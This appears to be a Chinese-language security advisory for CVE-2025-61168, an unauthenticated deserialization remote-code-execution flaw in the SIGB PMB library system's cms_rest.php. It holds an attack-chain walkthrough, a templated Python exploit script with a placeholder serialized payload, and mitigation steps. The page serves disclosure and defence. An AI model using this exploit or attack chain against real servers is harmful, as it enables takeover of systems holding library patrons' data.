CVE-2025-61168 SIGB PMB cms_rest.php反序列化远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-61168

漏洞类型

反序列化漏洞/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SIGB PMB v8.0.1.14

漏洞概述

CVE-2025-61168是影响SIGB PMB图书馆管理系统的一个严重安全漏洞，CVSS评分高达9.8分，属于紧急严重级别。该漏洞存在于cms_rest.php组件中，攻击者可以利用PHP反序列化机制存在的安全缺陷，通过构造恶意序列化对象并诱导服务器反序列化任意文件，从而在目标服务器上执行任意代码。

SIGB PMB是一款广泛使用的图书馆信息管理系统，用于管理图书馆的馆藏资源、读者信息、借阅流程等核心业务。由于该系统通常部署在教育机构、公共图书馆等场所，存储着大量敏感的读者信息和珍贵的数字资源，因此一旦被攻击者利用，将造成严重的数据泄露和系统破坏风险。

该漏洞的危险性在于其攻击门槛相对较低，攻击者无需任何认证凭据即可发起攻击，且可以通过网络远程利用。攻击成功后，攻击者可以获得服务器的完全控制权，进而横向移动到内网其他系统，窃取敏感数据，安装后门程序，或将服务器作为跳板进行其他恶意活动。

由于该漏洞已被公开披露，并且相关技术细节和利用代码已在互联网传播，强烈建议使用受影响版本系统的管理员立即采取修复措施，避免遭受攻击。

技术细节

该漏洞的核心问题在于SIGB PMB的cms_rest.php组件对用户输入的反序列化数据缺乏有效的安全验证。在PHP应用程序中，反序列化操作本身并不危险，但当反序列化的数据来自不可信的源时，攻击者可以构造恶意序列化对象，利用PHP的魔术方法（如__wakeup、__destruct、__toString等）在对象被反序列化或销毁时自动执行特定代码。

攻击者首先需要找到一个可写的文件位置，将恶意序列化的PHP对象写入文件。然后通过cms_rest.php组件的某个参数或接口，指定该文件路径并触发反序列化操作。当PHP引擎解析这个精心构造的序列化数据时，会按照预定的对象结构和类定义重建对象实例。在这个过程中，如果存在可利用的POP链（Property-Oriented Programming chain），攻击者就可以控制对象的属性值，最终触发任意代码执行。

利用此漏洞的关键步骤包括：1）识别目标系统中存在的可利用类；2）构造包含恶意代码的序列化对象；3）将该对象写入服务器可访问的文件位置；4）通过cms_rest.php组件加载并反序列化该文件。攻击者通常会使用eval()、system()、exec()等危险函数来执行系统命令，实现远程代码执行。

从CVSS向量来看，该漏洞具有网络可达性（AV:N）、无需认证（PR:N）、无需用户交互（UI:N）的特点，且对机密性、完整性和可用性均造成严重影响（CR:H/IR:H/AR:H），这进一步证实了其极高的危害程度。

攻击链分析

STEP 1

步骤1：信息收集与目标识别

攻击者首先识别运行SIGB PMB v8.0.1.14版本的目标服务器，确认cms_rest.php组件可访问，并收集系统环境信息以确定可利用的POP链

STEP 2

步骤2：构造恶意序列化负载

攻击者分析目标系统中的PHP类结构，特别是魔术方法和危险函数的使用，构造包含恶意代码的序列化对象，通常利用__destruct或__wakeup方法触发代码执行

STEP 3

步骤3：上传恶意文件

攻击者通过系统其他上传点或日志注入等方式，将包含恶意序列化数据的文件写入服务器可访问的位置，如/tmp目录、web根目录或可写的日志文件中

STEP 4

步骤4：触发反序列化

攻击者构造针对cms_rest.php的HTTP请求，通过file参数指定恶意文件路径，诱导服务器调用unserialize()函数处理该文件，触发POP链执行

STEP 5

步骤5：远程代码执行

当反序列化过程执行时，恶意对象中的代码被触发，攻击者获得服务器的命令执行权限，可以执行任意系统命令、读写文件或进一步横向移动

STEP 6

步骤6：持久化控制

攻击者通常会在成功RCE后植入后门、创建高权限账户或修改关键配置，实现持久化控制，为后续攻击活动建立稳固的立足点

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-61168 PoC - SIGB PMB cms_rest.php Unserialize RCE
Note: This PoC is for educational and authorized security testing purposes only.
"""

import requests
import sys
import base64

def generate_malicious_payload():
    """
    Generate PHP serialized payload for RCE
    Replace CLASS_NAME with actual exploitable class from target system
    """
    # Example payload structure - requires adjustment based on target
    # This uses a gadget chain to trigger code execution
    payload_template = '''O:XX:"ClassName":2:{s:XX:"property1";s:XX:"value";s:XX:"property2";O:XX:"ExecClass":1:{s:XX:"cmd";s:XX:"/bin/bash -c whoami";}}'''
    return base64.b64encode(payload_template.encode()).decode()

def exploit_target(target_url, file_path):
    """
    Exploit the unserialize vulnerability in cms_rest.php
    
    Args:
        target_url: Base URL of the vulnerable SIGB PMB installation
        file_path: Path to file containing malicious serialized payload
    
    Returns:
        bool: True if exploitation appears successful, False otherwise
    """
    endpoint = f"{target_url}/cms_rest.php"
    
    # Prepare the exploit request
    # The actual parameter names may vary - adjust based on reconnaissance
    params = {
        'action': 'unserialize',  # or other relevant action
        'file': file_path
    }
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; SecurityScanner/1.0)',
        'Accept': 'application/json, text/html'
    }
    
    try:
        print(f"[*] Sending exploit request to {endpoint}")
        response = requests.get(endpoint, params=params, headers=headers, timeout=30)
        
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)} bytes")
        
        if response.status_code == 200:
            # Check for indicators of successful exploitation
            if 'root' in response.text or 'www-data' in response.text or 'admin' in response.text:
                print("[+] Potential successful exploitation detected!")
                print(f"[+] Response snippet: {response.text[:500]}")
                return True
            else:
                print("[-] No obvious exploitation indicators in response")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        
    return False

def main():
    if len(sys.argv) < 3:
        print("Usage: python3 cve_2025_61168_poc.py <target_url> <payload_file_path>")
        print("Example: python3 cve_2025_61168_poc.py http://vulnerable-server.com /tmp/payload.txt")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    payload_file = sys.argv[2]
    
    print("=" * 60)
    print("CVE-2025-61168 PoC - SIGB PMB Unserialize RCE")
    print("=" * 60)
    
    success = exploit_target(target, payload_file)
    
    if success:
        print("\n[!] Exploitation completed - verify results manually")
    else:
        print("\n[-] Exploitation failed or target may not be vulnerable")
        print("[-] Verify: 1) Target is reachable, 2) Payload file exists and is valid")

if __name__ == "__main__":
    main()

影响范围

SIGB PMB v8.0.1.14及之前版本

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）通过Web服务器配置（如Apache/Nginx的rewrite规则）限制对cms_rest.php的直接访问，仅允许受信任的IP地址访问；2）暂时禁用或删除cms_rest.php组件中的反序列化功能；3）部署临时的WAF规则，检测包含序列化数据特征的异常请求；4）增强文件上传限制，防止攻击者将恶意文件写入服务器；5）监控系统日志，密切关注异常的序列化操作和可疑的系统命令执行行为。同时建议在非生产环境测试最新补丁，确认无兼容性问题后再部署到生产系统。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61168
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61168
3 Details https://www.cvedetails.com/cve/CVE-2025-61168/
4 VulDB https://vuldb.com/cve/CVE-2025-61168
5 Link http://pmb.com
6 Link http://sigb.com
7 Link https://forge.sigb.net/projects/pmb/wiki/Changelog_801#S%C3%A9curit%C3%A9-2
8 Link https://gist.github.com/ZanyMonk/446f6875a2ceb3decef5ff1176428f9e